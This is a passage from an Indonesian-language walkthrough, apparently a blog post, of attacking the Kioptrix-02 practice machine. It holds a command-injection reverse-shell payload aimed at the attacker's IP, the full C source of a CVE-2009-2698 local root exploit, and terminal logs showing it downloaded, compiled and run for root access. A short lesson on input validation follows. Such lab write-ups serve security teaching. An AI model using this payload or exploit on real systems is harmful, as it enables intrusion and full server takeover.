Maka langkah serangan yang pertama dilakukan adalah mendapatkan limited shell. Caranya dengan membuat mesin Kioptrix-02 menghubungi penyerang melalui teknik reverse shell. Adapun perintah reverse shell yang akan digunakan pada form tersebut dijadikan dalam satu rangkaian perintah bersama perintah ping, yaitu: 127.0.0.1;bash -i >& /dev/tcp/192.168.216.149/4444 0>&1. Sedangkan pada sisi penyerang digunakan perangkat netcat untuk membuka port 4444 (perhatikan gambar 7).

Gambar 7. Melakukan perintah reverse shell

Gambar 8. Limited Shell pada penyerang dengan menggunakan netcat

Langkah selanjutnya adalah meningkatkan hak akses menjadi root. Untuk itu, kita akan menghimpun berbagai informasi penting. Informasi yang paling penting adalah versi sistem operasi, tujuannya untuk melihat adanya potensi serangan dengan kernel exploitation. Dengan menggunakan perintah uname -a dan lsb_release -a dapat diidentifikasi bahwa versi Centos yang digunakan adalah versi 4.5.

Dengan melakukan riset dapat diketahui adanya kerenatanan Buffer Over Flow pada Centos versi 4.5. Kerentanan teknis pada kernel tersebut ditemukan oleh Tavis Ormandy dan Julian Tinnes dari Google Security Team, dengan kode kerentananya adalah CVE-2009-2698. Adapun file exploit-nya adalah sebagai berikut:

/*
**
** 0x82-CVE-2009-2698
** Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
**
** Tested White Box 4(2.6.9-5.ELsmp),
** CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp),
** Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5),
** Fedora Core 6(2.6.18-1.2798.fc6).
**
** --
** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.
** Thankful to them.
**
** --
** bash$ gcc -o 0x82-CVE-2009-2698 0x82-CVE-2009-2698.c && ./0x82-CVE-2009-2698
** sh-3.1# id
** uid=0(root) gid=0(root) groups=500(x82) context=user_u:system_r:unconfined_t
** sh-3.1#
** --
** exploit by <p0c73n1(at)gmail(dot)com>.
**
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/personality.h>

unsigned int uid, gid;
void get_root_uid(unsigned *task)
{
	unsigned *addr=task;
	while(addr[0]!=uid||addr[1]!=uid||addr[2]!=uid||addr[3]!=uid){
		addr++;
	}
	addr[0]=addr[1]=addr[2]=addr[3]=0; /* set uids */
	addr[4]=addr[5]=addr[6]=addr[7]=0; /* set gids */
	return;
}
void exploit();
void kernel_code()
{
	asm("exploit:\n"
		"push %eax\n"
		"movl $0xfffff000,%eax\n"
		"andl %esp,%eax\n"
		"pushl (%eax)\n"
		"call get_root_uid\n"
		"addl $4,%esp\n"
		"popl %eax\n");
	return;
}
void *kernel=kernel_code;

int main(int argc, char **argv)
{
	int fd=0;
	char buf[1024];
	struct sockaddr x0x;
	void *zero_page;

	uid=getuid();
	gid=getgid();
	if(uid==0){
		fprintf(stderr,"[-] check ur uid\n");
		return -1;
	}
	if(personality(0xffffffff)==PER_SVR4){
		if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){
			perror("[-] mprotect()");
			return -1;
		}
	}
	else if((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){
			perror("[-] mmap()");
			return -1;
	}
	*(unsigned long *)0x0=0x90909090;
	*(char *)0x00000004=0x90; /* +1 */
	*(char *)0x00000005=0xff;
	*(char *)0x00000006=0x25;
	*(unsigned long *)0x00000007=(unsigned long)&kernel;
	*(char *)0x0000000b=0xc3;

	if((fd=socket(PF_INET,SOCK_DGRAM,0))==-1){
		perror("[-] socket()");
		return -1;
	}
	x0x.sa_family=AF_UNSPEC;
	memset(x0x.sa_data,0x82,14);
	memset((char *)buf,0,sizeof(buf));
	sendto(fd,buf,1024,MSG_PROXY|MSG_MORE,&x0x,sizeof(x0x));
	sendto(fd,buf,1024,0,&x0x,sizeof(x0x));
	if(getuid()==uid){
		printf("[-] exploit failed, try again\n");
		return -1;
	}
	close(fd);
	execl("/bin/sh","sh","-i",NULL);
	return 0;
}

/* eoc */

// milw0rm.com [2009-08-31]
// https://raw.githubusercontent.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/master/2009/CVE-2009-2698/CVE-2009-2698.c

Selanjutnya penyerang mengunduh file tersebut dan mengirimkan ke mesin Kioptrix-02 untuk di-compile dengan gcc. Hasilnya, penyerang dapat menguasai mesin tersebut sepenuhnya yaitu berhasil meningkatkan hak akses menjadi root atau administrator pada server tersebut. Berikut ini adalah rangkaian perintah yang dilakukan.

root@kali2:~/Documents# wget https://raw.githubusercontent.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/master/2009/CVE-2009-2698/CVE-2009-2698.c
--2020-04-18 20:36:05--  https://raw.githubusercontent.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/master/2009/CVE-2009-2698/CVE-2009-2698.c
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.8.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.8.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2645 (2.6K) [text/plain]
Saving to: ‘CVE-2009-2698.c’

CVE-2009-2698.c           100%[==================================>]   2.58K  --.-KB/s    in 0s      

2020-04-18 20:36:05 (71.4 MB/s) - ‘CVE-2009-2698.c’ saved [2645/2645]

root@kali2:~/Documents# 
root@kali2:~/Documents# 
root@kali2:~/Documents# python -m SimpleHTTPServer 9999
Serving HTTP on 0.0.0.0 port 9999 ...
192.168.216.148 - - [18/Apr/2020 20:37:57] "GET /CVE-2009-2698.c HTTP/1.0" 200 -


bash-3.00$ cd /tmp
bash-3.00$ 
bash-3.00$ wget http://192.168.216.149:9999/CVE-2009-2698.c
--10:37:41--  http://192.168.216.149:9999/CVE-2009-2698.c
           => `CVE-2009-2698.c'
Connecting to 192.168.216.149:9999... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,645 (2.6K) [text/plain]

    0K ..                                                    100%  360.35 MB/s

10:37:41 (360.35 MB/s) - `CVE-2009-2698.c' saved [2645/2645]

bash-3.00$ ls -l
total 4
-rw-r--r--  1 apache apache 2645 Apr 18 23:36 CVE-2009-2698.c
bash-3.00$ 
bash-3.00$ gcc -o privKioptrix02 CVE-2009-2698.c
bash-3.00$ ls -l
total 12
-rw-r--r--  1 apache apache 2645 Apr 18 23:36 CVE-2009-2698.c
-rwxr-xr-x  1 apache apache 6941 Apr 19 10:38 privKioptrix02
bash-3.00$ chmod +x privKioptrix02
bash-3.00$ ls -l
total 12
-rw-r--r--  1 apache apache 2645 Apr 18 23:36 CVE-2009-2698.c
-rwxr-xr-x  1 apache apache 6941 Apr 19 10:38 privKioptrix02
bash-3.00$   
bash-3.00$ 
bash-3.00$ ./privKioptrix02
sh: no job control in this shell
sh-3.00# 
sh-3.00# ls -l
total 12
-rw-r--r--  1 apache apache 2645 Apr 18 23:36 CVE-2009-2698.c
-rwxr-xr-x  1 apache apache 6941 Apr 19 10:38 privKioptrix02
sh-3.00# ./privKioptrix02
[-] check ur uid
sh-3.00# 
sh-3.00# 
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00# 
sh-3.00# cd /root
sh-3.00# ls -l
total 80
-rw-r--r--  1 root root  1168 Oct  7  2009 anaconda-ks.cfg
-rw-r--r--  1 root root 53255 Oct  7  2009 install.log
-rw-r--r--  1 root root  3842 Oct  7  2009 install.log.syslog
sh-3.00#     
sh-3.00#

Lesson Learned

Dari kisah Kioptrix-02, ada pelajaran berharga yang patut diperhatikan oleh penyelenggara Sistem Elektronik, yaitu agar berhati-hati dengan serangan SQL Injection. Dalam kasus ini penyerang bisa mendapatkan limited shell. Selanjutnya, dengan memanfaatkan sistem operasi yang tidak di-patch atau di-upgrade ke versi terbaru, penyerang dapat menguasai sebuah server secara keseluruhan dan melakukan tindakan kriminal apa pun sesukanya.

Untuk melakukan mitigasi terhadap serangan SQL Injection, hendaknya dilakukan verifikasi terhadap berbagai karakter yang digunakan untuk mengisi form dalam aplikasi web. Jangan percaya pada setiap input pada form, selalu lakukan verifikasi sebelum diteruskan ke database di backend. Never Trust, Always Verify !

Tahap Pertama: Scanning dan Enumeration

Tahap Kedua : Mapping Attack Surface

Tahap Ketiga : Exploitation dan Post-Exploitation

Lesson Learned

Share this:

Related